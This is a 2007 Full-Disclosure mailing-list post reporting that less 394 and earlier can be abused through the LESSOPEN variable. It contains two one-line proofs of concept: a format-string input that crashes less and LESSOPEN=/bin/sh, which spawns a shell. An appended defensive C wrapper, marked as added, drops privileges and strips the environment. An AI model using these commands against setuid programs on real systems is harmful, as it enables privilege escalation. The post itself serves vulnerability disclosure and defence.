[Full-disclosure] [+] Vulnerability in less version 394 and prior
fdlist at digitaloffense.net
Wed Oct 31 04:41:39 GMT 2007
$ LESSOPEN=/bin/sh less /dev/null
sh-3.2$
On Tuesday 30 October 2007, glopeda.com wrote:
> There exists a format string bug in the less application present in
> most flavors of UNIX. It could be leveraged for privilege escalation
> if the calling application is setuid/setgid and does not properly drop
> privileges.
>
> Meager demonstration:
> $ export LESSOPEN=%s%n
> $ less somefile
> Segmentation fault
Full-Disclosure is hosted and sponsored by Secunia.
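For the setuid/setgid case raised in the quoted report, an added example (not part of either message and not code from less): a C wrapper that drops privileges permanently and starts the pager with a fixed environment, so a caller-supplied LESSOPEN never reaches less. The path /usr/bin/less, the variable allowlist and all function names are assumptions made for this sketch.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define PAGER_PATH "/usr/bin/less"   /* assumed install path */
#define ENV_MAX 8

/* Only these variables are copied from the caller; LESSOPEN, LESSCLOSE,
 * LESS, EDITOR and everything else are never handed to the pager. */
static const char *const ENV_ALLOW[] = { "TERM", "LANG", "LC_ALL", NULL };

/* Fill out[] with a fixed PATH, LESSSECURE=1 (less's secure mode) and the
 * allowlisted variables. Returns the entry count; out[] is NULL-terminated. */
size_t build_pager_env(char *out[ENV_MAX]) {
    static char bufs[3][256];
    size_t n = 0;
    out[n++] = "PATH=/usr/bin:/bin";
    out[n++] = "LESSSECURE=1";
    for (size_t i = 0; ENV_ALLOW[i]; i++) {
        const char *v = getenv(ENV_ALLOW[i]);
        if (!v) continue;
        int r = snprintf(bufs[i], sizeof bufs[i], "%s=%s", ENV_ALLOW[i], v);
        if (r > 0 && r < (int)sizeof bufs[i]) out[n++] = bufs[i];
    }
    out[n] = NULL;
    return n;
}

/* Drop setuid/setgid privileges for good: group first, then user, then
 * fail closed if the old effective IDs can still be restored. */
int drop_privileges(void) {
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    if (setregid(rgid, rgid) != 0 || setreuid(ruid, ruid) != 0) return -1;
    if (egid != rgid && setegid(egid) == 0) return -1;
    if (euid != ruid && seteuid(euid) == 0) return -1;
    return 0;
}

int run_pager(const char *file) {
    char *envp[ENV_MAX];
    if (drop_privileges() != 0) return -1;
    build_pager_env(envp);
    execle(PAGER_PATH, "less", "--", file, (char *)NULL, envp);
    return -1;   /* only reached if exec failed */
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s FILE\n", argv[0]); return 2; }
    return run_pager(argv[1]) == 0 ? 0 : 1;
}
```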